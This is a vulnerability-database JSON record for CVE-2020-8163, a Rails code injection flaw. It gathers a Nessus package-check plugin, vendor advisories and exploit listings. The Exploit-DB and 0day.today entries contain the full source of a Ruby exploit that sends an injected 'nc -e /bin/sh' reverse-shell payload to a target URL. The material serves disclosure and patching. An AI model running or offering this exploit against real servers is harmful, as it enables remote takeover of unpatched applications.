"nessus", "title": "Debian DLA-2282-1 : rails security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8163", "CVE-2020-8164", "CVE-2020-8165"], "modified": "2020-08-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:rails", "p-cpe:/a:debian:debian_linux:ruby-actionmailer", "p-cpe:/a:debian:debian_linux:ruby-actionpack", "p-cpe:/a:debian:debian_linux:ruby-actionview", "p-cpe:/a:debian:debian_linux:ruby-activejob", "p-cpe:/a:debian:debian_linux:ruby-activemodel", "p-cpe:/a:debian:debian_linux:ruby-activerecord", "p-cpe:/a:debian:debian_linux:ruby-activesupport", "p-cpe:/a:debian:debian_linux:ruby-rails", "p-cpe:/a:debian:debian_linux:ruby-railties", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2282.NASL", "href": "https://www.tenable.com/plugins/nessus/138781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2282-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138781);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2020-8163\", \"CVE-2020-8164\", \"CVE-2020-8165\");\n\n script_name(english:\"Debian DLA-2282-1 : rails security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8163\n\nA code injection vulnerability in Rails would allow an attacker who\ncontrolled the `locals` argument of a `render` call to perform a RCE.\n\nCVE-2020-8164\n\nA deserialization of untrusted data vulnerability exists in rails\nwhich can allow an attacker to supply information can be inadvertently\nleaked from Strong Parameters.\n\nCVE-2020-8165\n\nA deserialization of untrusted data vulnernerability exists in rails\nthat can allow an attacker to unmarshal user-provided objects in\nMemCacheStore and RedisCacheStore potentially resulting in an RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/rails\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/rails\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/rails\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"rails\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionmailer\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionpack\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-actionview\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activejob\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activemodel\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activerecord\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-activesupport\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-rails\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"ruby-railties\", reference:\"2:4.2.7.1-1+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:31", "description": "\n\nRuby on Rails blog:\n\nDue to an unfortunate oversight, Rails 4.2.11.2 has a missing constant\n\t error. To address this Rails 4.2.11.3 has been released.\nThe original announcement for CVE-2020-8163 has a follow-up message\n\t with an updated patch if you\u2019re unable to use the gems.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-15T00:00:00", "type": "freebsd", "title": "Rails -- remote code execution vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-05-15T00:00:00", "id": "CE6DB19B-976E-11EA-93C4-08002728F74C", "href": "https://vuxml.freebsd.org/freebsd/ce6db19b-976e-11ea-93c4-08002728f74c.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-01-23T15:31:26", "description": "# CVE-2020-8163\nEnviroment and exploit to CVE-2020-8163 Blind re...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-18T18:42:23", "type": "githubexploit", "title": "Exploit for Code Injection in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-01-23T10:56:09", "id": "99AFA98B-C3B5-5B12-A277-25806B690D91", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-18T04:12:13", "description": "# CVE-2020-8163\nCVE-2020-8163 - Remote code execution of user-pr...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-19T21:03:05", "type": "githubexploit", "title": "Exploit for Code Injection in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-06-18T04:00:40", "id": "FAC09967-A61C-5A0F-955B-288A554521D5", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "redhatcve": [{"lastseen": "2022-06-08T08:07:38", "description": "The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-18T20:27:34", "type": "redhatcve", "title": "CVE-2020-8163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-06-08T07:11:28", "id": "RH:CVE-2020-8163", "href": "https://access.redhat.com/security/cve/cve-2020-8163", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "github": [{"lastseen": "2022-05-30T15:31:26", "description": "The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T16:34:27", "type": "github", "title": "Potential remote code execution of user-provided local names in ActionView", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-05-26T20:46:17", "id": "GHSA-CR3X-7M39-C6JQ", "href": "https://github.com/advisories/GHSA-cr3x-7m39-c6jq", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-27T14:00:31", "description": "Exploit for ruby platform in category web applications", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "zdt", "title": "Rails 5.0.1 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-27T00:00:00", "id": "1337DAY-ID-34750", "href": "https://0day.today/exploit/description/34750", "sourceData": "# Exploit Title: Rails 5.0.1 - Remote Code Execution\r\n# Exploit Author: Lucas Amorim\r\n# Vendor Homepage: www.rubyonrails.org\r\n# Software Link: www.rubyonrails.org\r\n# Version: Rails < 5.0.1\r\n# Tested on: Linux/OSx\r\n# CVE : CVE-2020-8163\r\n# More information: https://github.com/sh286/CVE-2020-8163\r\n\r\n#!/usr/bin/ruby\r\n\r\nrequire 'net/http'\r\n\r\ndef header\r\n puts \"[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\\n\" \r\n puts \"[*] - Author: Lucas Amorim [email\u00a0protected]\"\r\n puts \"[*] - Usage: \\n\"\r\n puts \"ruby exploit.rb <url> <ip> <port>\"\r\nend\r\nif ARGV.length < 3\r\n header\r\n exit(-1)\r\nend\r\n\r\nurl = ARGV[0]\r\nip = ARGV[1]\r\nport = ARGV[2]\r\n\r\nputs \"[*] Sending payload to #{url}\"\r\nuri = URI(url+\"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23\")\r\nNet::HTTP.get(uri)\n\n# 0day.today [2020-07-27] #", "sourceHref": "https://0day.today/exploit/34750", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-01-21T20:25:45", "description": "The is a code injection vulnerability in versions of Rails prior to 5.0.1\nthat wouldallow an attacker who controlled the `locals` argument of a\n`render` call to perform a RCE.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-02T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8163", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-02T00:00:00", "id": "UB:CVE-2020-8163", "href": "https://ubuntu.com/security/CVE-2020-8163", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "gitlab": [{"lastseen": "2022-06-09T23:06:35", "description": "The is a code injection vulnerability in versions of Rails that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-02T00:00:00", "type": "gitlab", "title": "Improper Control of Generation of Code ('Code Injection')", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2020-07-02T00:00:00", "id": "GITLAB-F6C92F51462903F2DDEFEDA0B0261A8E", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2020-8163.yml/raw", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-05-24T18:58:28", "description": "The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-02T19:15:00", "type": "cve", "title": "CVE-2020-8163", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-05-24T16:06:00", "cpe": ["cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-8163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8163", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "osv": [{"lastseen": "2022-06-10T05:03:13", "description": "The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T16:34:27", "type": "osv", "title": "Potential remote code execution of user-provided local names in ActionView", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163"], "modified": "2022-06-10T02:12:16", "id": "OSV:GHSA-CR3X-7M39-C6JQ", "href": "https://osv.dev/vulnerability/GHSA-cr3x-7m39-c6jq", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-01-13T05:30:31", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-26T00:00:00", "type": "exploitdb", "title": "Rails 5.0.1 - Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163", "2020-8163"], "modified": "2020-07-26T00:00:00", "id": "EDB-ID:48716", "href": "https://www.exploit-db.com/exploits/48716", "sourceData": "# Exploit Title: Rails 5.0.1 - Remote Code Execution\r\n# Date: 2020-07-19\r\n# Exploit Author: Lucas Amorim\r\n# Vendor Homepage: www.rubyonrails.org\r\n# Software Link: www.rubyonrails.org\r\n# Version: Rails < 5.0.1\r\n# Tested on: Linux/OSx\r\n# CVE : CVE-2020-8163\r\n# More information: https://github.com/sh286/CVE-2020-8163\r\n\r\n#!/usr/bin/ruby\r\n\r\nrequire 'net/http'\r\n\r\ndef header\r\n puts \"[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\\n\" \r\n puts \"[*] - Author: Lucas Amorim lucas@lucasamorim.ca\"\r\n puts \"[*] - Usage: \\n\"\r\n puts \"ruby exploit.rb <url> <ip> <port>\"\r\nend\r\nif ARGV.length < 3\r\n header\r\n exit(-1)\r\nend\r\n\r\nurl = ARGV[0]\r\nip = ARGV[1]\r\nport = ARGV[2]\r\n\r\nputs \"[*] Sending payload to #{url}\"\r\nuri = URI(url+\"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23\")\r\nNet::HTTP.get(uri)", "sourceHref": "https://www.exploit-db.com/download/48716", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-12-06T03:03:11", "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2282-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ \nJuly 20, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : rails\nVersion : 2:4.2.7.1-1+deb9u3\nCVE ID : CVE-2020-8163 CVE-2020-8164 CVE-2020-8165\n\nMultiple vulnerabilities were found in Ruby on Rails, a MVC ruby-based\nframework geared for web application development, which could lead to\nremote code execution and untrusted user input usage, depending on the\napplication.\n\nCVE-2020-8163\n\n A code injection vulnerability in Rails would allow an attacker\n who controlled the `locals` argument of a `render` call to perform\n a RCE.\n\nCVE-2020-8164\n\n A deserialization of untrusted data vulnerability exists in rails\n which can allow an attacker to supply information can be\n inadvertently leaked from Strong Parameters.\n\nCVE-2020-8165\n\n A deserialization of untrusted data vulnernerability exists in\n rails that can allow an attacker to unmarshal user-provided objects\n in MemCacheStore and RedisCacheStore potentially resulting in an\n RCE.\n\nFor Debian 9 stretch, these problems have been fixed in version\n2:4.2.7.1-1+deb9u3.\n\nWe recommend that you upgrade your rails packages.\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/rails\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-20T13:17:33", "type": "debian", "title": "[SECURITY] [DLA 2282-1] rails security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8163", "CVE-2020-8164", "CVE-2020-8165"], "modified": "2020-07-20T13:17:33", "id": "DEBIAN:DLA-2282-1:AA7B9", "href": "https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2020-8163
